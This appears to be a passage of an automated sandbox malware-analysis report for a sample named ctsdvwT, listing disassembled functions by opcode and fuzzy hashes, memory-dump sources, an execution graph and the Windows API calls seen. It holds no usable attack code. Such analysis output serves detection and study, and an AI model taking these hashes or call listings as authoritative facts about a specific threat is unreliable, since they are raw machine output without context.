                                        • Opcode Fuzzy Hash: a7d4898e9fa426df27302c16304ac157d39f69301ed27a1065a3d13a56078ddc
                                        • Instruction Fuzzy Hash: F7217431E01209DBDF58CFA4D45469EB7B2FF8A310F20866AE915FB394DB719846CB50
                                        Function 026F8D60 Relevance: .1, Instructions: 78COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1935197820.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26f0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b4a7f579c00b47dfbb6274ec89550b51f1a4d3b126f5642547535ed51a8d6199
                                        • Instruction ID: 370a266eb01036dbdbbde1305f7aff9377ed239c380f9b26295f72c209d3dffe
                                        • Opcode Fuzzy Hash: b4a7f579c00b47dfbb6274ec89550b51f1a4d3b126f5642547535ed51a8d6199
                                        • Instruction Fuzzy Hash: 47215E31E0060ADBDF15DFA4D89469EF7B2BF89304F14C65AE905EB344EB719886CB90
                                        Function 026F6B9B Relevance: .1, Instructions: 77COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1935197820.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26f0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8d75a6bb61757090ec0b75529e2e7c8ddd3de72af8ea18bf2fb776e9aed4b46f
                                        • Instruction ID: 26636ae9b117113980ecf1d6047ea255635d9518b22cf540b8da7b826a563329
                                        • Opcode Fuzzy Hash: 8d75a6bb61757090ec0b75529e2e7c8ddd3de72af8ea18bf2fb776e9aed4b46f
                                        • Instruction Fuzzy Hash: 692103726093C08FC7169735C46428A7F76DF86315B0540EFC195CB392EA258C4AC7A1
                                        Function 026F17D0 Relevance: .1, Instructions: 76COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1935197820.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26f0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2936159d4b78617c021f57fd990f19c9f0a376b5402fdd44f24ae3b53154c3b9
                                        • Instruction ID: 68decaa44d92f7fe73acdb4ae7c5479c5f7a63fbfd2d417c86c11b039009f3bc
                                        • Opcode Fuzzy Hash: 2936159d4b78617c021f57fd990f19c9f0a376b5402fdd44f24ae3b53154c3b9
                                        • Instruction Fuzzy Hash: 1B21B776F00215EFDF51AB78985879E3BE5FB4A6A0F1408A6E90DC7344E735C8018791
                                        Function 026F4F98 Relevance: .1, Instructions: 76COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1935197820.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26f0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5730d2d58ae418f1a366bc07182425a27051f92a7c8607e5bdb1d61da05d0016
                                        • Instruction ID: 70fa1903c009de6dccae44f4413484d4b3a80bd09450c4266a97e84ddb3ba8b0
                                        • Opcode Fuzzy Hash: 5730d2d58ae418f1a366bc07182425a27051f92a7c8607e5bdb1d61da05d0016
                                        • Instruction Fuzzy Hash: 5E213B34700245CFDB54EB78C958BAD77F1EB8E345B1004A8E506EB7A0DB369D06CB91
                                        Function 00A9D01C Relevance: .1, Instructions: 72COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1933011760.0000000000A9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A9D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_a9d000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0c41286a6b328542652ac0fd1570bca7836b2d46fc5350aa76c0af88a8e51a0b
                                        • Instruction ID: 198bef8f8f68d2722773c719ecfc9739b24f729c20a4d052eeaecbb2deb7fad2
                                        • Opcode Fuzzy Hash: 0c41286a6b328542652ac0fd1570bca7836b2d46fc5350aa76c0af88a8e51a0b
                                        • Instruction Fuzzy Hash: CC21FF71604340EFDF14DF24D984B26BBA5FB88314F20C569E84A4B286C73AD887CA62
                                        Function 026F9530 Relevance: .1, Instructions: 71COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1935197820.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26f0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c51c1b9368a7adad64fd3449a647f5cf2a0f4c20b6b34f68490293fa048293e2
                                        • Instruction ID: 896fc1cfd8499a1ff466052bac04b0ef4ff788b0b88832c1366a687ea45ca23d
                                        • Opcode Fuzzy Hash: c51c1b9368a7adad64fd3449a647f5cf2a0f4c20b6b34f68490293fa048293e2
                                        • Instruction Fuzzy Hash: 55216F71B101158FEF44DB69C954BAE7BF6AF88714F108069E605EB3A4DB71DD00CB90
                                        Function 026F1889 Relevance: .1, Instructions: 70COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1935197820.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26f0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 664629c583f6eed60ed179d7cc5137361b59c0a9bd29b3ef88267a23612a6daa
                                        • Instruction ID: 5f1074ffb8604a97147e03f5d252f22928e307d09cfaa7ad480d25bd2c10cf2b
                                        • Opcode Fuzzy Hash: 664629c583f6eed60ed179d7cc5137361b59c0a9bd29b3ef88267a23612a6daa
                                        • Instruction Fuzzy Hash: 57213030B00215DFDFA4EB78C5547AE77F1AB8A384F1004A9C609EB3A4DB369D41CB95
                                        Function 026F1898 Relevance: .1, Instructions: 70COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1935197820.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26f0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9d6b87476bfd082799d950dd4dbe77ffd6bf64e92463052b9b3902818742e86f
                                        • Instruction ID: c2b197e2f1ae1eee1ad59675abd0bd468a82306f1b45b961a2e65a708bbd28f9
                                        • Opcode Fuzzy Hash: 9d6b87476bfd082799d950dd4dbe77ffd6bf64e92463052b9b3902818742e86f
                                        • Instruction Fuzzy Hash: 64213130700219DFDF64EB78C5547AE77F6AB8A285F1004A8C509EB3A4DB369D41CBD1
                                        Function 026F8C60 Relevance: .1, Instructions: 70COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1935197820.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26f0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0c6df6f2daa06024b85f32c3e038be55aff619b7179cfbd5ac4d2405767047f0
                                        • Instruction ID: f49cfa0e83f4f15a3c35647bc5b6dbfbfc134e2887818f7fb2c6101911eb262d
                                        • Opcode Fuzzy Hash: 0c6df6f2daa06024b85f32c3e038be55aff619b7179cfbd5ac4d2405767047f0
                                        • Instruction Fuzzy Hash: 3F216231E01209DBDF08CFA4C85469EB7B2AF89304F10866AE915FB394DB719845CB50
                                        Function 026F16C0 Relevance: .1, Instructions: 69COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1935197820.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26f0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b9e7a0d5197ef115c9a5156ad9774d9165831a877282c248292a5988d36cb16d
                                        • Instruction ID: 3c2c2d0259d62d1d98a13be8f87a002e31bf7f43e339a708f908b9c8eeb4a83b
                                        • Opcode Fuzzy Hash: b9e7a0d5197ef115c9a5156ad9774d9165831a877282c248292a5988d36cb16d
                                        • Instruction Fuzzy Hash: F421A238200501DBDF62FB38EC9872A3369F78A754F144AA6E10DC7359EB75DC418B91
                                        Function 026F4FA8 Relevance: .1, Instructions: 68COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1935197820.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26f0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 99270673397b7adaeadc5124c6b95945f4ec45da63d672e8aea496ea4952f3e0
                                        • Instruction ID: a60e1e39861268844344cdc82a308c4b5dbc5afb2433f1a8ccd8ccb8bf1d8941
                                        • Opcode Fuzzy Hash: 99270673397b7adaeadc5124c6b95945f4ec45da63d672e8aea496ea4952f3e0
                                        • Instruction Fuzzy Hash: 71211934700245CFDB54DB78C558BAE77F1AB8D345B1004A8D606EB7A0DB369D01CB91
                                        Function 026F0848 Relevance: .1, Instructions: 62COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1935197820.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26f0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9ea248946b960927b0938b60fea28252d2289c630064eeb1a19ca9717a9046fe
                                        • Instruction ID: 792ebb77ef774b236082af4c947ef3da594ff5c61a01e7de4780514b5762b891
                                        • Opcode Fuzzy Hash: 9ea248946b960927b0938b60fea28252d2289c630064eeb1a19ca9717a9046fe
                                        • Instruction Fuzzy Hash: CA11A734B002058FEF946B79D9547393355FB85214F20897AD617CF34AEB61CC818BC1
                                        Function 026F0838 Relevance: .1, Instructions: 61COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1935197820.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26f0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: db93bf6ae5075d753aa227a74c75a09db906900473ffa5f6857ccd323e705579
                                        • Instruction ID: 690067936b5844ef8f0789eddfd1fde63b2ae36d09f91baa11ad0d6543cf76f7
                                        • Opcode Fuzzy Hash: db93bf6ae5075d753aa227a74c75a09db906900473ffa5f6857ccd323e705579
                                        • Instruction Fuzzy Hash: 0D11E034B042058FEFA567B5995036A3765EB86210F20896AD612CF38BEB64CC818BC1
                                        Function 00A9D006 Relevance: .1, Instructions: 60COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1933011760.0000000000A9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A9D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_a9d000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e3fb5124520d44414316b3f2ece7279f92706d2f0ba3976cf9b2c6f8775a3ae3
                                        • Instruction ID: 13e11403a9ba28f0942a04103987308969c9b85ced2c29e459defceea487b33d
                                        • Opcode Fuzzy Hash: e3fb5124520d44414316b3f2ece7279f92706d2f0ba3976cf9b2c6f8775a3ae3
                                        • Instruction Fuzzy Hash: 1121C6755093808FDB02CF20D590715BFB1FB45314F28C5EAD8498B697C33AD84ACB62
                                        Function 026F14A8 Relevance: .1, Instructions: 53COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1935197820.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26f0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ac07d9d9fa34c69c72396bdb1879d159b860ac3630a656014afe82e503fee39e
                                        • Instruction ID: 7295f6df62e718f9c30618df33bdd148034249733754de1d67e2526694f8a47d
                                        • Opcode Fuzzy Hash: ac07d9d9fa34c69c72396bdb1879d159b860ac3630a656014afe82e503fee39e
                                        • Instruction Fuzzy Hash: 95018071A01215DFCFA1EFB984542AD7BF6EF49250B5104BADA0AE7301E735C8418FA5
                                        Function 026F9398 Relevance: .0, Instructions: 47COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1935197820.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26f0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d9bfe306068dda23430115133cba776663869fd9cdd5b4083df6e30babad1e39
                                        • Instruction ID: 28c2dacf72fe5ce538e83e824056fbabe725de537c50b13511858c2e0d145f23
                                        • Opcode Fuzzy Hash: d9bfe306068dda23430115133cba776663869fd9cdd5b4083df6e30babad1e39
                                        • Instruction Fuzzy Hash: 4C019E31A002048BDF04EF95D98478AB766FFC5711F548264D9086B29AEBB0E905CBA1
                                        Function 026F7BF0 Relevance: .0, Instructions: 39COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1935197820.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26f0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 91a6ffc2ecd46314af80b1eb338487d27d7073178cb79737c60d3dec53d8ca62
                                        • Instruction ID: 60e73bf379c1d0703a7c4e198042beecd87db80484736bbe73dbc7e791f39341
                                        • Opcode Fuzzy Hash: 91a6ffc2ecd46314af80b1eb338487d27d7073178cb79737c60d3dec53d8ca62
                                        • Instruction Fuzzy Hash: 79014F34A0120AEFDB05FBB4FD9559D7BB2FB85700F1085AEC0089B295DB711E098B82
                                        Function 026F1534 Relevance: .0, Instructions: 36COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1935197820.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26f0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0b1d09f7b7b46a6c7653f598fdb09eb8b846f63391c618d2295b1050b6e18718
                                        • Instruction ID: 7161b64984a65b6d039ad9c3b59017fb26e3cb3fd3ea6dbd07944c34ed567203
                                        • Opcode Fuzzy Hash: 0b1d09f7b7b46a6c7653f598fdb09eb8b846f63391c618d2295b1050b6e18718
                                        • Instruction Fuzzy Hash: 57F02BB7A04150CFDF52CBB494501ACBBB1EF8629175950DBDA0BDB302D334D402CB51
                                        Function 026F7C00 Relevance: .0, Instructions: 33COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1935197820.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26f0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f3510d63b5f44a7a644800277b02b0277e4bcec7f4201fd28d6c0121796123bd
                                        • Instruction ID: 36dd3673229c0c3a0f139a1f75287dae6212db51eedbb4e4a55b8e4bcc09e45c
                                        • Opcode Fuzzy Hash: f3510d63b5f44a7a644800277b02b0277e4bcec7f4201fd28d6c0121796123bd
                                        • Instruction Fuzzy Hash: 0FF04F34A0020AEFDB05FBB8FD8559D77B2FB84700F5086A9C0089B255EF712F098B81

                                        Execution Graph

                                        Execution Coverage:7.5%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:0%
                                        Total number of Nodes:38
                                        Total number of Limit Nodes:6
                                        execution_graph 14814 100d3e0 DuplicateHandle 14815 100d476 14814->14815 14816 100acf0 14817 100acff 14816->14817 14820 100ade7 14816->14820 14825 100add9 14816->14825 14821 100ae1c 14820->14821 14822 100adf9 14820->14822 14821->14817 14822->14821 14823 100b020 GetModuleHandleW 14822->14823 14824 100b04d 14823->14824 14824->14817 14827 100ade3 14825->14827 14826 100ae1c 14826->14817 14827->14826 14828 100b020 GetModuleHandleW 14827->14828 14829 100b04d 14828->14829 14829->14817 14830 100d198 14831 100d1de GetCurrentProcess 14830->14831 14833 100d230 GetCurrentThread 14831->14833 14834 100d229 14831->14834 14835 100d266 14833->14835 14836 100d26d GetCurrentProcess 14833->14836 14834->14833 14835->14836 14839 100d2a3 14836->14839 14837 100d2cb GetCurrentThreadId 14838 100d2fc 14837->14838 14839->14837 14840 1004668 14841 100467a 14840->14841 14842 1004686 14841->14842 14844 1004778 14841->14844 14845 1004783 14844->14845 14849 1004888 14845->14849 14853 1004887 14845->14853 14851 10048af 14849->14851 14850 100498c 14850->14850 14851->14850 14857 10044d4 14851->14857 14854 10048af 14853->14854 14855 100498c 14854->14855 14856 10044d4 CreateActCtxA 14854->14856 14856->14855 14858 1005918 CreateActCtxA 14857->14858 14860 10059db 14858->14860

                                        Executed Functions

                                        Function 0100D188 Relevance: 6.1, APIs: 4, Instructions: 134threadCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • GetCurrentProcess.KERNEL32 ref: 0100D216
                                        • GetCurrentThread.KERNEL32 ref: 0100D253
                                        • GetCurrentProcess.KERNEL32 ref: 0100D290
                                        • GetCurrentThreadId.KERNEL32 ref: 0100D2E9
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1947554601.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_1000000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: Current$ProcessThread
                                        • String ID:
                                        • API String ID: 2063062207-0
                                        • Opcode ID: 44f682d165aaba6740b1217bf79b295faaa22f292361c12f9764d64b4049fbd7
                                        • Instruction ID: 19d2dcd60b74db064c22588a9c95b28f46adbf326049ea3c0464a234dfc8953e
                                        • Opcode Fuzzy Hash: 44f682d165aaba6740b1217bf79b295faaa22f292361c12f9764d64b4049fbd7
                                        • Instruction Fuzzy Hash: A15197B090074A8FEB09DFAAD548B9EBBF1FF88314F208459D459A7390D734A944CF66
                                        Function 0100D198 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • GetCurrentProcess.KERNEL32 ref: 0100D216
                                        • GetCurrentThread.KERNEL32 ref: 0100D253
                                        • GetCurrentProcess.KERNEL32 ref: 0100D290
                                        • GetCurrentThreadId.KERNEL32 ref: 0100D2E9
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1947554601.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_1000000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: Current$ProcessThread
                                        • String ID:
                                        • API String ID: 2063062207-0
                                        • Opcode ID: 5f9a8706c425571a25ee5608d726e194afcc05c01d079400c2d35c0e455cc39a
                                        • Instruction ID: 3aef1662f04dadd1a0143e993f8d23e8014db19201c1f6ddd32a80a4de3a70da
                                        • Opcode Fuzzy Hash: 5f9a8706c425571a25ee5608d726e194afcc05c01d079400c2d35c0e455cc39a
                                        • Instruction Fuzzy Hash: E15187B090074ACFEB05DFAAD548B9EBBF1FF88314F208459E459A7290D734A944CF65
                                        Function 0100ADD9 Relevance: 1.7, APIs: 1, Instructions: 200COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 44 100add9-100adf7 46 100ae23-100ae27 44->46 47 100adf9-100ae06 call 100a16c 44->47 48 100ae29-100ae33 46->48 49 100ae3b-100ae7c 46->49 54 100ae08 47->54 55 100ae1c 47->55 48->49 56 100ae89-100ae97 49->56 57 100ae7e-100ae86 49->57 101 100ae0e call 100b480 54->101 102 100ae0e call 100b441 54->102 103 100ae0e call 100b47f 54->103 55->46 58 100ae99-100ae9e 56->58 59 100aebb-100aebd 56->59 57->56 62 100aea0-100aea7 call 100a178 58->62 63 100aea9 58->63 61 100aec0-100aec7 59->61 60 100ae14-100ae16 60->55 64 100af58-100b018 60->64 65 100aed4-100aedb 61->65 66 100aec9-100aed1 61->66 68 100aeab-100aeb9 62->68 63->68 96 100b020-100b04b GetModuleHandleW 64->96 97 100b01a-100b01d 64->97 69 100aee8-100aef1 call 100a188 65->69 70 100aedd-100aee5 65->70 66->65 68->61 76 100aef3-100aefb 69->76 77 100aefe-100af03 69->77 70->69 76->77 78 100af21-100af2e 77->78 79 100af05-100af0c 77->79 85 100af30-100af4e 78->85 86 100af51-100af57 78->86 79->78 81 100af0e-100af1e call 100a198 call 100a1a8 79->81 81->78 85->86 98 100b054-100b068 96->98 99 100b04d-100b053 96->99 97->96 99->98 101->60 102->60 103->60
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0100B03E
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1947554601.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_1000000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        • Opcode ID: 0910033068330b6e2edd51838f9b2d0d1baddd28dd8ea74aab8cdcf1e9dbbd41
                                        • Instruction ID: 03fb596c6b06a01403181e0fc0ea625c5674fa82efba7dab86933f8cecc5e070
                                        • Opcode Fuzzy Hash: 0910033068330b6e2edd51838f9b2d0d1baddd28dd8ea74aab8cdcf1e9dbbd41
                                        • Instruction Fuzzy Hash: 00813470A00B45CFEB65DF69D44479ABBF1BF88300F008A2DD48ADBA80D775E945CB91
                                        Function 010044D4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 104 10044d4-10059d9 CreateActCtxA 107 10059e2-1005a3c 104->107 108 10059db-10059e1 104->108 115 1005a4b-1005a4f 107->115 116 1005a3e-1005a41 107->116 108->107 117 1005a60 115->117 118 1005a51-1005a5d 115->118 116->115 119 1005a61 117->119 118->117 119->119
                                        APIs
                                        • CreateActCtxA.KERNEL32(?), ref: 010059C9
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1947554601.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_1000000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: Create
                                        • String ID:
                                        • API String ID: 2289755597-0
                                        • Opcode ID: f57ffff350b55e989219fa36db381b55a0af61353c41826e14bae2ac2bb2a7f6
                                        • Instruction ID: 236fe0f0de95451938003362ed9540f82bf503197e3d9c5d64a1bf34df42487f
                                        • Opcode Fuzzy Hash: f57ffff350b55e989219fa36db381b55a0af61353c41826e14bae2ac2bb2a7f6
                                        • Instruction Fuzzy Hash: BF41D070C00719CFEB25DFA9C884B8EBBF5BF49704F24806AD448AB251DB756946CF90
                                        Function 0100D3D9 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 121 100d3d9-100d474 DuplicateHandle 122 100d476-100d47c 121->122 123 100d47d-100d49a 121->123 122->123
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0100D467
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1947554601.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_1000000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        • Opcode ID: 5a4aef543c9f1eced12439e1775cf72cd2b7d1e485c9bcd3fc7f405a28a969d1
                                        • Instruction ID: 0992a88363836871420646bfda8626f004629157b2f9a66dad2fb15c8a6766a6
                                        • Opcode Fuzzy Hash: 5a4aef543c9f1eced12439e1775cf72cd2b7d1e485c9bcd3fc7f405a28a969d1
                                        • Instruction Fuzzy Hash: 8F21E2B5900249EFDB10CFAAD484ADEFFF5EB48320F14841AE958A3350D379A945CFA5
                                        Function 0100D3E0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 126 100d3e0-100d474 DuplicateHandle 127 100d476-100d47c 126->127 128 100d47d-100d49a 126->128 127->128
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0100D467
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1947554601.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_1000000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        • Opcode ID: 933878f624d840a56d146caf7ef8a27955b1bd4d559f086edb0e87c5b19ce594
                                        • Instruction ID: 98e32dec66709d1ed8872063be58ccf55007e87528d5dad16b30d2d625c117e3
                                        • Opcode Fuzzy Hash: 933878f624d840a56d146caf7ef8a27955b1bd4d559f086edb0e87c5b19ce594
                                        • Instruction Fuzzy Hash: 8721C2B5900249EFDB10CFAAD884ADEBBF9EB48310F14841AE958A3350D375A945CFA5
                                        Function 0100AFD8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 131 100afd8-100b018 132 100b020-100b04b GetModuleHandleW 131->132 133 100b01a-100b01d 131->133 134 100b054-100b068 132->134 135 100b04d-100b053 132->135 133->132 135->134
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0100B03E
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1947554601.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_1000000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        • Opcode ID: 88cb0297c2527fdc11f4494f79b0d04893fd23f987ca9cfb7610c776a58560fb
                                        • Instruction ID: 76f05c57af7631e18d552e5616f1253ac68f49ae1b4ec69a80b6ade2eee819a7
                                        • Opcode Fuzzy Hash: 88cb0297c2527fdc11f4494f79b0d04893fd23f987ca9cfb7610c776a58560fb
                                        • Instruction Fuzzy Hash: 231110B9C007498FEB20CF9AD444BDEFBF4EB88314F10841AD569A7250D379A545CFA1
                                        Function 00E5D1FC Relevance: .1, Instructions: 76COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1947190571.0000000000E5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E5D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_e5d000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 325ebe0e8baf9d2de882f9efa8d8c72cc6a1b143bc83b2479e043a88b0852f61
                                        • Instruction ID: 940ccddac198b56c4b868a855e59825bb6f4224e969f7babb0a9a6bcaafaccf5
                                        • Opcode Fuzzy Hash: 325ebe0e8baf9d2de882f9efa8d8c72cc6a1b143bc83b2479e043a88b0852f61
                                        • Instruction Fuzzy Hash: 3C212875508340DFDB15DF50DCC0B26BBA5FB88315F20C969ED095B266C336D81ACBA2
